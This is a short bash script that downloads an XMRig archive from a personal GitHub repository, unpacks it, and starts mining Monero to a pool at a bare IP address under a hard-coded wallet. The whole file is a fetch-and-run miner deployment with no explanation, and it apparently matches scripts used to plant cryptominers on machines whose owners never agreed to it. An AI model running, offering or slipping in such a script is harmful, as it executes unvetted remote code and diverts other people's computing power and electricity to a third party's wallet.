#!/bin/bash
wget https://github.com/Adeemar7/all/raw/main/xmrig.tar.gz && tar -xvf xmrig.tar.gz
./xmrig --donate-level 1 -o 188.166.216.79:443 -u SaLvs7xtCagbC9ait3ZzE5ZG3PCbMMknpQXvsrMuqG9D34XDU7W9sBtXY2rKXuLryTM1CqkSazP6SSpSpvVdPnUUXm7twSsQQJJ -p b -a rx/0
